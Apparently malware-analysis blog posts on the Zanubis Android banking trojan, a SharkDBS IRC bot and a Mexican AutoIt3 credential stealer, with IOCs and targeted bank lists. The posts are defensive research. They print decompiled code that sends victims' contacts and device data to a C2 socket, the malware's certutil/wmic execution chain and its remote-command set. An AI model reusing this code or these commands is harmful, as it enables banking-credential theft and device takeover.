Zanubis updates with screenshot recording

As always, IOCs and targets at the end. Previous updates of this family at: https://www.entdark.net/2022/09/zanubis-latam-banking-trojan.html

The latest Zanubis sample contains overall updates to the code. Among the most interesting ones, is that they are shifting to record the screen via the MediaProjection API and use it to send to back to the C2. The functionality is triggered via socket with the command "iniciarVnc".

The crafted video from the screen recording is stored as "RecordedVideo.mp4" in external storage:

Via accessibility is has also added code to copy text from the clipboard as well as sending keystrokes remotely. It also contains a method to simulate swipes given the start and end coordinates, with the intention of controlling the victims device:

As of recent samples, it will also send the users to a government site to check their debts on app startup:

IOCs:

SHA256: https://www.virustotal.com/gui/file/e756e44290ccf5f9d6864444bbd9044c2345c60a0352de5724eb5928d29e0018/behavior

KEY: $%FLO032DFKSF234dsdf4RLOCMV@#

Banks targeted:

• pe.com.banBifBanking.icBanking.androidUI
• com.bbva.nxt_peru
• pe.com.interbank.mobilebanking
• com.mibanco.bancamovil
• pe.com.scotiabank.blpm.android.client
• com.bcp.bank.bcp
• pe.com.bn.app.bancodelanacion
• per.bf.desa
• com.bcp.innovacxion.yapeapp
• com.pe.cajasullana.cajamovil
• pe.pichincha.bm
• com.ripley.banco.peru
• com.cmac.cajamovilaqp
• com.cajahuancayo.cajahuancayo.appcajahuancayo
• com.cmacica.prd
• pe.cajapiura.bancamovil
• pe.solera.tarjetaoh
• com.alfinbanco.appclientes
• pe.com.bancomercio.mobilebanking
• com.bm_gnb_pe
• com.zoluxiones.officebanking
• pe.com.cajametropolitana.homebankingcml.cmlhomebanking
• com.pe.cajacusco.movil
• com.caja.myapplication
• com.cajamaynas.cajamaynas
• com.cajatacna.droid
• com.appcajatrujillo
• pe.com.tarjetacencosud.canales.mitarjetacencosud
• pe.com.cajacentro
• pe.com.prymera.digital.app
• pe.com.compartamos.bancamovil
• pe.confianza.bancamovil
• id=com.credinkamovil.pe
• pe.com.scotiabank.blpm.android.client.csf
• com.efectivadigital.appclientes
• com.qapaq.banking
• pe.com.tarjetasperuanasprepago.tppapp
• maximo.peru.pe
• air.PrexPeru
• pe.com.tarjetaw.neobank
• com.fif.fpay.android.pe
• com.cencosud.pe.metro
• com.cencosud.pe.wong
• com.tottus
• com.pichincha.cashmanagement
• com.binance.dev
• com.gateio.gateio
• com.google.android.apps.authenticator2
• com.bbva.GEMA.global
• pe.com.scotiabank.businessbanking
• com.bcp.bank.tlc
• com.scotiabank.telebankingapp
• com.bitkeep.wallet
• com.bitmart.bitmarket
• com.bitcoin.mwallet
• com.bbva.bbvawalletpe
• com.bbva.lukita
• cash.klever.blockchain.wallet
• org.theta.wallet
• com.wallet.crypto.trustapp
• com.myetherwallet.mewwallet
• pe.interbank.bie

Initial URL: https://mibegnon[.]com/wp-content/css/index.php

Socket C2: 5.252.178.86

C2:

• http://001.kidz4lifeplus[.]org/005/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/006/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/001/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/004/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/002/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/010/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/003/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/008/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/007/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/009/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/011/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/015/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/017/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/012/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/014/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/013/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34
• http://001.kidz4lifeplus[.]org/016/389d3bf103aeec5039e30f1410d18fcd/inicio?tg81w=cv34

SharkDBS IRC/FTP Bot

As always, IOCs at the end. 

Characteristics:

• Uses IRC to send data to the attacker and FTP.

• Get the victim's IP address via external services, uses ip2location until it is able to connect to the external service.

• Get list of applications

• Send SMS using the device.

• Requests several permissions:

• android.permission.INTERNET

• android.permission.READ_EXTERNAL_STORAGE

• android.permission.RECEIVE_BOOT_COMPLETED

• android.permission.REBOOT

• android.permission.CALL_PHONE

• android.permission.READ_SMS

• android.permission.READ_CONTACTS

• android.permission.SEND_SMS

• android.permission.WRITE_EXTERNAL_STORAGE

• android.permission.READ_CALL_LOG

• android.permission.SYSTEM_ALERT_WINDOW

• Includes Spanish strings in the code, suggesting the actor is from a Spanish speaking country. 

• The IP the duckdns serves the APK from is from Spain.

• Useful links:

• Virustotal Graph: https://www.virustotal.com/graph/embed/g1f66b84527234df186946867ace02cc1d175d8dd4bd045cf948261dd16565c7d 

• Virustotal Collection: https://www.virustotal.com/gui/collection/4b368a9e4f689c2585fdf10248d7a117bfca4300bb6494d9c10ea5278400e0f1

This sample seems like work in progress. There is functionality implemented that is not called during execution. 

The channel and ids and credentials used to send data via IRC or via FTP. 

When connecting to the remote IRC server it answers from `irc.prodigybot[.]net`:

The random ID is generated by choosing a random number which is hardcoded:

It iterates in a loop to ensure that the BOT_IP is always the latest one:

There is functionality to get the list of applications installed in the device but it is not called, the same goes for sending SMS and getting the contacts list. 

The owner or owners point to maybe two different actors, SharK and G0ku, as seen in the code:

 

On the other side, this duckdns dynDNS url has been used in the past for other payloads and has hosted other unrelated malicious files:

Also, the serving IP address 95.60.57[.]103 is from Spain:

Similar samples were seen in the wild previously the 12th of August of 2022 and points to a work in progress. In previous samples, it contains similar functionality with slight differences. For example, data is stored in resources and the credentials stay the same. The resource owner might point to two actors.

Some functions not present in the current sample such as fetching mails via accountmanager are present in these old samples:

IOCs:

• Sample SHA256: a0715a88e289763cac6ca6ce5b5b24575c6d966591c7949eb88d0024dcace2bc

• anunnakii.duckdns.org:6667 IRC port

• Owners: {"G0KU", "SharK"}

• Resolving IP address of the dyndns: 95.60.57[.]103

• Other SHA256:

• ca0f0b0f2175ad5a982c6a135fb833e0d0f6093fdbd8004483804e5177c89671

• 496590c57e3c3cc1cebbfb5135667a00ff11678ca0a3c913c5532ce8169221f4

• c3fa7ac9db35a7d28468b25429a8334d22c6819b12df923e6dd65e2d0f9c8aa3

• 7e339c8bac29595a26185bdda3242919e0c0ab64fa54ce454ede738c983c306d

• 33c9320da28b5d1bd7b1a3ef1ac2b16f2977dfb6cd5e03f2868d956fa1d6ab45

• 2855011ea35cb91642ca75bd3d027273b83cb4511f5a4da50c41b15df9490793

Zanubis updates their list of targets, author nickname

 In recent changes the actors behind the Zanubis banking trojan have broadened their list of targets: The basic configuration has been updated and the actor has included what seems to be their nickname on the code:

As seen from the code, the actor behind these samples "6y Mr S0(k37" has also updated the key and removed the empty defaults seen in previous versions. Obfuscation has also received updated to try to slow down analysts.

The remote socket is the same address as seen in previous samples and has changed the hardcoded domain. The underlying decryption/encryption routines are the same as in previous samples, only obfuscated.

Samples:

https://www.virustotal.com/gui/file/44dd79ed23516673af9084ea8120f3d412e815ab3df36e9c7e2028363cd086de/

https://www.virustotal.com/gui/file/6f643819b96ca4b0451293954100b1739865fc593d6c75048563ac5d9a34479a

Network IOCs:

• http[:]//92.38.190.112[:]8000/instalado
• http[:]//92.38.190.112[:]8000/socket.io/?EIO=4&transport=polling
• http[:]//92.38.190.112[:]8000/socket.io/?EIO=4&transport=polling&sid=T3eaWnJhJxgE-phPAFhC
• http[:]//92.38.190.112[:]8000/socket.io/?EIO=4&transport=polling&sid=go4rhV3f5ps_Nu2JAFgc
• http[:]//92.38.190.112[:]8000/socket.io/?EIO=4&transport=websocket&sid=T3eaWnJhJxgE-phPAFhC
• http[:]//92.38.190.112[:]8000/socket.io/?EIO=4&transport=websocket&sid=go4rhV3f5ps_Nu2JAFgc
• http[:]//christopherwilhelm[.]com/2/index.php?q=004&id=3ce00749dd913534
• http[:]//christopherwilhelm[.]com/favicon.ico

Updated list of banks targeted:

• pe.com.banBifBanking.icBanking.androidUI
• com.bbva.nxt_peru
• pe.com.interbank.mobilebanking
• com.mibanco.bancamovil
• pe.com.scotiabank.blpm.android.client
• com.bcp.bank.bcp
• pe.com.bn.app.bancodelanacion
• com.falabella.falabellaApp
• com.bcp.innovacxion.yapeapp
• com.pe.cajasullana.cajamovil
• pe.pichincha.bm
• com.ripley.banco.peru
• com.cmac.cajamovilaqp
• com.cajahuancayo.cajahuancayo.appcajahuancayo
• com.cmacica.prd
• pe.cajapiura.bancamovil
• pe.solera.tarjetaoh
• com.alfinbanco.appclientes
• pe.com.bancomercio.mobilebanking
• com.bm_gnb_pe
• com.zoluxiones.officebanking
• pe.com.cajametropolitana.homebankingcml.cmlhomebanking
• com.pe.cajacusco.movil
• com.caja.myapplication
• com.cajamaynas.cajamaynas
• com.cajatacna.droid
• com.appcajatrujillo
• pe.com.tarjetacencosud.canales.mitarjetacencosud
• pe.com.cajacentro
• pe.com.prymera.digital.app
• pe.com.compartamos.bancamovil
• pe.confianza.bancamovil
• id=com.credinkamovil.pe
• pe.com.scotiabank.blpm.android.client.csf
• com.efectivadigital.appclientes
• com.qapaq.banking
• pe.com.tarjetasperuanasprepago.tppapp
• maximo.peru.pe
• air.PrexPeru
• pe.com.tarjetaw.neobank
• com.fif.fpay.android.pe
• com.cencosud.pe.metro
• com.cencosud.pe.wong
• com.tottus
• com.pichincha.cashmanagement
• com.banbifbancaempresasapp

11/10/23 update

A new sample emerges with a obfuscation and different key and endpoints.

VT Link: https://www.virustotal.com/gui/file/4560c27d6656bcf5f5f4d101daab3ccdd5f0edd4f5b279b66464019a7cbe9aba 

Also a rotating list of C2s to connect to:

C2 list:

• http://001[.]safoodinc[.]com/005/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/006/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/001/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/004/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/002/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/010/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/003/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/008/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/007/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/009/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/011/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/015/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/017/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/012/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/014/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/013/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]safoodinc[.]com/016/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65

Targeted banks:

• pe.com.banBifBanking.icBanking.androidUI
• com.bbva.nxt_peru
• pe.com.interbank.mobilebanking
• com.mibanco.bancamovil
• pe.com.scotiabank.blpm.android.client
• com.bcp.bank.bcp
• pe.com.bn.app.bancodelanacion
• per.bf.desa
• com.bcp.innovacxion.yapeapp
• com.pe.cajasullana.cajamovil
• pe.pichincha.bm
• com.ripley.banco.peru
• com.cmac.cajamovilaqp
• com.cajahuancayo.cajahuancayo.appcajahuancayo
• com.cmacica.prd
• pe.cajapiura.bancamovil
• pe.solera.tarjetaoh
• com.alfinbanco.appclientes
• pe.com.bancomercio.mobilebanking
• com.bm_gnb_pe
• com.zoluxiones.officebanking
• pe.com.cajametropolitana.homebankingcml.cmlhomebanking
• com.pe.cajacusco.movil
• com.caja.myapplication
• com.cajamaynas.cajamaynas
• com.cajatacna.droid
• com.appcajatrujillo
• pe.com.tarjetacencosud.canales.mitarjetacencosud
• pe.com.cajacentro
• pe.com.prymera.digital.app
• pe.com.compartamos.bancamovil
• pe.confianza.bancamovil
• id=com.credinkamovil.pe
• pe.com.scotiabank.blpm.android.client.csf
• com.efectivadigital.appclientes
• com.qapaq.banking
• pe.com.tarjetasperuanasprepago.tppapp
• maximo.peru.pe
• air.PrexPeru
• pe.com.tarjetaw.neobank
• com.fif.fpay.android.pe
• com.cencosud.pe.metro
• com.cencosud.pe.wong
• com.tottus
• com.pichincha.cashmanagement
• com.binance.dev
• com.gateio.gateio
• com.google.android.apps.authenticator2
• com.bbva.GEMA.global
• pe.com.scotiabank.businessbanking
• com.bcp.bank.tlc
• com.scotiabank.telebankingapp
• com.bitkeep.wallet
• com.bitmart.bitmarket
• com.bitcoin.mwallet
• com.bbva.bbvawalletpe
• com.bbva.lukita
• cash.klever.blockchain.wallet
• org.theta.wallet
• com.wallet.crypto.trustapp
• com.myetherwallet.mewwallet

Update 13/10/23

VT Link: https://www.virustotal.com/gui/file/ad729ff3963682680bbef0d1345e743938dac29792a96b6f64fd048509aea140

KEY: $%FLO032DFKSF234dsdf4RLOCMV@

Websocket: 5.252.178.55:8000

C2:

• http://hilineinternational[.]com/favicon.ico
• http://hilineinternational[.]com/wp-content/informes/assets/css/animate.min.css
• http://hilineinternational[.]com/wp-content/informes/imagenes/samsung/samsung_r_1.png
• http://hilineinternational[.]com/wp-content/informes/imagenes/samsung/samsung_r_2.png
• http://hilineinternational[.]com/wp-content/informes/imagenes/samsung/samsung_r_3.png
• http://hilineinternational[.]com/wp-content/informes/imagenes/samsung/samsung_r_4.png
• http://hilineinternational[.]com/wp-content/informes/index.php?q=002&id=c20a35c83b3b984a
• http://hilineinternational[.]com/wp-content/informes/index.php?q=004&id=3ce00749dd913534
• http://001.kidz4lifeplus[.]org/005/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/006/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/001/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/004/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/002/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/010/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/003/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/008/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/007/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/009/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/011/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/015/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/017/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/012/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/014/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/013/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654
• http://001.kidz4lifeplus[.]org/016/b609642e94c68a7c022a75cf69b3123f/inicio?tg81w=cvb654

Targeted banks:

• pe.com.banBifBanking.icBanking.androidUI
• com.bbva.nxt_peru
• pe.com.interbank.mobilebanking
• com.mibanco.bancamovil
• pe.com.scotiabank.blpm.android.client
• com.bcp.bank.bcp
• pe.com.bn.app.bancodelanacion
• per.bf.desa
• com.bcp.innovacxion.yapeapp
• com.pe.cajasullana.cajamovil
• pe.pichincha.bm
• com.ripley.banco.peru
• com.cmac.cajamovilaqp
• com.cajahuancayo.cajahuancayo.appcajahuancayo
• com.cmacica.prd
• pe.cajapiura.bancamovil
• pe.solera.tarjetaoh
• com.alfinbanco.appclientes
• pe.com.bancomercio.mobilebanking
• com.bm_gnb_pe
• com.zoluxiones.officebanking
• pe.com.cajametropolitana.homebankingcml.cmlhomebanking
• com.pe.cajacusco.movil
• com.caja.myapplication
• com.cajamaynas.cajamaynas
• com.cajatacna.droid
• com.appcajatrujillo
• pe.com.tarjetacencosud.canales.mitarjetacencosud
• pe.com.cajacentro
• pe.com.prymera.digital.app
• pe.com.compartamos.bancamovil
• pe.confianza.bancamovil
• id=com.credinkamovil.pe
• pe.com.scotiabank.blpm.android.client.csf
• com.efectivadigital.appclientes
• com.qapaq.banking
• pe.com.tarjetasperuanasprepago.tppapp
• maximo.peru.pe
• air.PrexPeru
• pe.com.tarjetaw.neobank
• com.fif.fpay.android.pe
• com.cencosud.pe.metro
• com.cencosud.pe.wong
• com.tottus
• com.pichincha.cashmanagement
• com.binance.dev
• com.gateio.gateio
• com.google.android.apps.authenticator2
• com.bbva.GEMA.global
• pe.com.scotiabank.businessbanking
• com.bcp.bank.tlc
• com.scotiabank.telebankingapp
• com.bitkeep.wallet
• com.bitmart.bitmarket
• com.bitcoin.mwallet
• com.bbva.bbvawalletpe
• com.bbva.lukita
• cash.klever.blockchain.wallet
• org.theta.wallet
• com.wallet.crypto.trustapp
• com.myetherwallet.mewwallet
• pe.interbank.bie

28/10/23

New sample, no interesting updates so far. Keeps the same obfuscation style.

Initial URL:

• https://prizmadigital[.]com/wp-includes/css/css/index.php

Websocket

• http://5.252.178[.]86:8000/instalado
• http://5.252.178[.]86:8000/socket.io/?EIO=4&transport=polling
• http://5.252.178[.]86:8000/socket.io/?EIO=4&transport=polling&sid=ER-owsoQdp4H8N71AAja
• http://5.252.178[.]86:8000/socket.io/?EIO=4&transport=websocket&sid=ER-owsoQdp4H8N71AAja

C2

• http://001[.]kidz4lifeplus[.]org//005/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//006/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//001/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//004/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//002/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//010/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//003/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//008/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//007/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//009/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//011/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//015/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//017/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//012/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//014/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//013/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65
• http://001[.]kidz4lifeplus[.]org//016/d2802ce8a9529fb351ebd500c918d44b/inicio?pvs=gt65

Targeted banks:

• pe.com.banBifBanking.icBanking.androidUI
• com.bbva.nxt_peru
• pe.com.interbank.mobilebanking
• com.mibanco.bancamovil
• pe.com.scotiabank.blpm.android.client
• com.bcp.bank.bcp
• pe.com.bn.app.bancodelanacion
• per.bf.desa
• com.bcp.innovacxion.yapeapp
• com.pe.cajasullana.cajamovil
• pe.pichincha.bm
• com.ripley.banco.peru
• com.cmac.cajamovilaqp
• com.cajahuancayo.cajahuancayo.appcajahuancayo
• com.cmacica.prd
• pe.cajapiura.bancamovil
• pe.solera.tarjetaoh
• com.alfinbanco.appclientes
• pe.com.bancomercio.mobilebanking
• com.bm_gnb_pe
• com.zoluxiones.officebanking
• pe.com.cajametropolitana.homebankingcml.cmlhomebanking
• com.pe.cajacusco.movil
• com.caja.myapplication
• com.cajamaynas.cajamaynas
• com.cajatacna.droid
• com.appcajatrujillo
• pe.com.tarjetacencosud.canales.mitarjetacencosud
• pe.com.cajacentro
• pe.com.prymera.digital.app
• pe.com.compartamos.bancamovil
• pe.confianza.bancamovil
• id=com.credinkamovil.pe
• pe.com.scotiabank.blpm.android.client.csf
• com.efectivadigital.appclientes
• com.qapaq.banking
• pe.com.tarjetasperuanasprepago.tppapp
• maximo.peru.pe
• air.PrexPeru
• pe.com.tarjetaw.neobank
• com.fif.fpay.android.pe
• com.cencosud.pe.metro
• com.cencosud.pe.wong
• com.tottus
• com.pichincha.cashmanagement
• com.binance.dev
• com.gateio.gateio
• com.google.android.apps.authenticator2
• com.bbva.GEMA.global
• pe.com.scotiabank.businessbanking
• com.bcp.bank.tlc
• com.scotiabank.telebankingapp
• com.bitkeep.wallet
• com.bitmart.bitmarket
• com.bitcoin.mwallet
• com.bbva.bbvawalletpe
• com.bbva.lukita
• cash.klever.blockchain.wallet
• org.theta.wallet
• com.wallet.crypto.trustapp
• com.myetherwallet.mewwallet
• pe.interbank.bie

Pekulev MX AutoIt3 Malware

 Came across this familia via this tweet.

This malware uses a single .rar file downloaded from a remote resource and is geofenced to MX IP addresses and contains within a .CMD file with the payload inside it. In essence it targets Outlook stored passwords in registry and chrome databases. 

Analysis

Once the .cmd file runs, it calls the following commands in sequence:

• more +5 C:\Users\user\Desktop\FichaReembolso.cmd

• certutil -decode -f ~~ "C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

• cmdline: certutil -decode -f C:\Users\user\Desktop\FichaReembolso.cmd "C:\Users\user\AppData\Roaming\jkjlhkj\a3x\X2NI\FichaReembolso.a3x"

• wmic process call create '"C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

It uses the more cmd to check that the file does indeed exist and then proceeds to decode the payload contained within the CMD line file. This payload contains an autoit binary as well as a compiled autoit3 script to execute the payload. The following structure is created:

The folder A3X/X2NI contains the compiled autoit script which once decompiled allows us to continue extracting data. The decompiled autoit3 script contains auxiliary functions to download files and checks if all the required files are present. It needs the SQLite3 DLLs to query the browser's database files and check for the history via this query:

In these samples the list of banks targeted are all from MX, as expected from the geofencing restrictions:

• enlaceapp.santander.com.mx

• see.sbi.com.mx/invernet2000

• enlace.santander.com.mx

• security.online-banking.hsbc.com.mx

• bbvanetcash

• scotiaweb.scotiabank.com.mx

• empresas.bbvanet.com.mx

If any of the URLs is present in the database, then the data is posted to the remote server (OS Language, Keyboard layout, ISADMIN, Architecture) and uses taskkill to kill the chrome.exe process. It uses the user-agent Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

It does not only target chrome but also tries to steal stored outlook POP3/SMTP/IMAP credentials found on the target machine by extracting them from the registry. Auxiliary functions allow the script to decode the stored data and unprotect it by making use of WINAPIs (CryptUnprotectData)

The script makes use of binaries that are already present in the system to gather all the required information, it takes advantage of WMIC to identify the infected OS operative system. Additionally, it has an auxiliary function to check if it is Windows 7:

Only after it has finished its tasks it will prompt a MessageBox containing saying there was an error during the execution and attempts to run a VBS file. I suspect the VBS file is some sort of cleanup file OR the next stage, but I was not able to get it during my analysis. (If you came across it, please let me know)

VT Collection

https://www.virustotal.com/gui/collection/ee82e5de022753696c4508aa5ca2b37f90ed2fe77de462a351021588abaed625/graph

IOCs

• https://documents.drive.dreamixcorporation.com

• https://documents.drive.dreamixcorporation.com/do/it.php?f=2&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=3&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=4&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=r3&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=6&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=7&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?f=8&w=Windows%2010

• https://documents.drive.dreamixcorporation.com/do/it.php?b1

• https://documents.drive.dreamixcorporation.com/do/it.php?f=9&w=Windows%2010

• https://www.autoitscript.com/autoit3/pkgmgr/sqlite/sqlite3.dll

• https://documents.drive.dreamixcorporation.com/do/it.php?b1

• 1b2ed5b0f4b63e24ce9fdfb3d56645e9cd9eab5a

• af3fa2057b618c31a46633c50150e2c70eeae2e5

• 3d483a4726a6e959c3b636be154569f20a287834

• 4ef8c96c5601435494d4b0f6e7068695ab20509d

• 137a312c8ab7389afb5af0d3980ffb7c6a7dd5e1

• ab01d12bb8378cb434b148d5187eb43914032402

• 15f454e11784c54dd289cd97b972888147a1920d

• bcc74050fc4618eaadee788221c173ff9825b919

• dd442d63405275ba64c2d6ade804bbefb797b7ea

• fc62e0658eda805bd8c91c6badb2fc3e30726250

  
  

Zanubis LATAM Banking Trojan

 Brief note: I analyzed this sample I found thanks to MHT's tweet https://twitter.com/malwrhunterteam/status/1564972377452298245?s=20&t=hqLnACKdbcCOPLjLrNMfyw

07/09/2022 update at the end.

This is the first time I see this sample, not sure if there is more documentation about it (if there is, please let me know). I am going to refer to this sample as Zanubis from now on, the reasoning behind this is the decryption key being Zanubis in the sample I analyzed. At the end, IOCs, SHA256 and targeted banks can be found.

At the time of this writing, the samples were not packed and still contained logging from the authors. These samples are likely still not final versions.

The trojan

This is an overlay-based banking trojan abusing accessibility, the infection method the standard one and it stores a list of applications in shared_preferences. It is focused on targeting LATAM banks and in this sample it focuses on Peru banks. 

On startup, the ServerPrimerosPasos() method is called and retrieves the following information:

• List of contacts of the device

• List of installed applications

• Device data which includes:

• manufacturer

• model

• fingerprint

• It checks for the brand of the device and checks specifically for Motorola, Samsung and Huawei devices.

• Ignore battery optimizations.

This information is formatted and sent to the remote server via websockets:

public void ServerPrimerosPasos() {         try {             String contactos = this.funciones.ObtenerContactos();             String apps = this.funciones.ObtenerApps();             String datosTelefono = this.dispositivo.ObtenerDatos();             String cont_res = "{ " + this.funciones.ObtenerIdCliente() + ", \"contactos\" : " + contactos + ", \"apps\" : " + apps + ", \"device_info\" : " + datosTelefono + " }";             this.socket.emit("datos_iniciales_cliente", str_encript(cont_res, this.config.KEY_STR));         } catch (Exception e) {         }     }

Websocket communications

Once the sample is installed in the victims device, it uses the hardcoded initial URL to post data to a remote server. After the first post, the next ones will receive encrypted strings from both the trojan and the server:

Initial data sent (on install)

Response received (on install)

Device configuration

Device packages

The vistas package contains all the code related to Views and WebViews, including tests and customized views to request the SMS, Battery and accessibility permissions. The authors have left some logging comments in the sample. Likely to debug their code:

Log.e("vista alerta", "en teoria se esta creando la ventana");

Information is posted to the remote server via the NotificarPost method:

public void NotificarPost(String contenido) {         FnApiCon apiCon = new FnApiCon(new FnApiCon.AsyncResponse() { // from class: com.personal.pdf.funciones.Funciones.1             @Override // com.personal.pdf.funciones.FnApiCon.AsyncResponse             public void processFinish(String output) {             }         });         apiCon.prepararConsulta("d=" + contenido, this.context);         apiCon.execute(new String[0]);     }

Configuration

The class called Configuracion stores the default configuration of the sample. The most important information that is stored here for us is:

• KEY_STR: Used to encrypt messages as seen in the ServerPrimerosPasos() screenshots

• URL_INICIAL: Is the startup URL that is used on onCreate within a  WebView and enables Javascript content

• PREF_LLAVE

• SOCKET_SERVER: Remote address to open a WebSocket. This websocket exposes the following commands:

• config_packages: Returns the list of installed packages in the system

• desinstalar_app and eliminar_app: Deletes the target application

• bloquear_telefono: Locks the screen

• notificacion: Sends a push notification to the user. The message is received from the socket and decrypted

• enviar_sms: Sends an SMS

• permiso_contacto: Requests the contacts permiso

• permiso_sms: Get SMS permission

• rev_permiso_sms: Reset SMS permission

• unlock_package: Allow the target package to be uninstalled

Next are some code snippets related to the previous commands:

